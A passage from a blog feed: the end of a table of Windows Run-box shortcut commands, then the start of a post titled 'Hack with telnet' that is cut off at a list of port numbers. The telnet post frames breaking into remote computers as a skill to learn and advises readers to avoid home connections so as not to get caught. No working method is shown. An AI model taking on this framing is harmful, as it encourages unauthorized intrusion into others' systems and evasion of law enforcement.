&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Outlook Express&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;msimn&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Paint&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;pbrush&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Password Properties&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;password.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Performance Monitor&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;perfmon.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Performance Monitor&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;perfmon&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Phone and Modem Options&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;telephon.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Phone Dialer&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;dialer&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Pinball Game&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;pinball&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Power Configuration&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;powercfg.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Printers and Faxes&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;control printers&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Printers Folder&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;printers&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Private Characters Editor&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;eudcedit&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Quicktime ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;quicktime.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Quicktime Player ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;quicktimeplayer&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Real Player ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;realplay&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Regional Settings&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;intl.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Registry Editor&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;regedit&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Registry Editor&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;regedit32&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Remote Access Phonebook&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;rasphone&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Remote Desktop&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;mstsc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Removable Storage&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ntmsmgr.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Removable Storage Operator Requests&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ntmsoprq.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Resultant Set of Policy ( xp pro )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;rsop.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Scanners and Cameras&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;sticpl.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Scheduled Tasks&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;control schedtasks&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Security Center&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;wscui.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Services&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;services.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Shared Folders&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;fsmgmt.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Sharing Session&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;rtcshare&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Shuts Down Windows&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;shutdown&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Sounds Recorder&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;sndrec32&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Sounds and Audio&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;mmsys.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Spider Solitare Card Game&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;spider&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;SQL Client Configuration&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;clicongf&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;System Configuration Editor&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;sysedit&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;System Configuration Utility&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;msconfig&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;System File Checker Utility ( Scan Immediately )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;sfc /scannow&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;System File Checker Utility ( Scan Once At Next Boot )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;sfc /scanonce&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;System File Checker Utility ( Scan On Every Boot )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;sfc /scanboot&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;System File Checker Utility ( Return to Default Settings)&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;sfc /revert&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;System File Checker Utility ( Purge File Cache )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;sfc /purgecache&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;System File Checker Utility ( Set Cache Size to Size x )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;sfc /cachesize=x&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;System Information&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;msinfo32&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;System Properties&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;sysdm.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Task Manager&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;taskmgr&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;TCP Tester&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;tcptest&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Telnet Client&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;telnet&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Tweak UI ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;tweakui&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;User Account Management&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;nusrmgr.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Utility Manager&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;utilman&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Volume Serial Number for C:&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;label&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Volume Control&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;sndvol32&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows Address Book&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;wab&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows Address Book Import Utility&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;wabmig&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows Backup Utility ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ntbackup&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows Explorer&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;explorer&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows Firewall&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;firewall.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows Installer Details&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;msiexec&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows Magnifier&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;magnify&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows Management Infrastructure&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;wmimgmt.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows Media Player&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;wmplayer&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows Messenger&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;msnsgs&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows Picture Import Wizard (Need camera connected)&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;wiaacmgr&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows System Security Tool&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;syskey&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows Script host settings&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;wscript&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Widnows Update Launches&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;wupdmgr&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows Version ( shows your windows version )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;winver&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows XP Tour Wizard&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;tourstart&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Wordpad&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;write&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Zoom Utility&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;igfxzoom&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/6280301039803805817/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/windows-sortcut-command.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/6280301039803805817'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/6280301039803805817'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/windows-sortcut-command.html' title='Windows sortcut command'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-6616823361318179285</id><published>2011-05-07T23:35:00.000-07:00</published><updated>2011-05-07T23:35:31.562-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Computer Hack"/><title type='text'>Hack with telnet</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Telnet is a service gives the users to access a host and perform as if they were working, If you call yourself a Hacker you must be able to do telnet.It can be done in many ways, be careful not to try from your home because a tons of hackers have been busted for doing this,I recommend you &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD5&quot;&gt;reading&lt;/span&gt; my article on &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;15 tips on How to Survive as a Hacker&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt; to protect yourself from being caught while HackingWell there are many methods to hack with telnet but i will tell you about two simplest method to hack with telnet:&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;a href=&quot;http://julianhakingarticles.blogspot.com/2011/04/how-to-hack-remote-computer-with-telnet.html&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Hack a &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD4&quot;&gt;remote computer&lt;/span&gt; with telnet Method 1:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Before looking at this method to &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Hack with telnet&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt; you must know that what are ports?There are two kinds of ports-Physical(HardWare) and Virtual(Software)You may be thinking of ports to be the slots behind your CPU to whichy ou connect your Mouse or Keyboard or your monitor. These sockets are called physical ports .&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD9&quot;&gt;We are here&lt;/span&gt; interested in only virtual ports.It is nothing physical but it is kind of a virtual pipe through which information can go in and out of the computer.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;A particular computer can have a large number of ports. All ports are numbered .Now at each port a particular service is running. A software which runs on a port is called service . For interchanging different kinds of information different ports are used. A typical list shows the various ports&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Ping : 7&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Systat : 11&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Time : 13&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;NetStat : 15&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
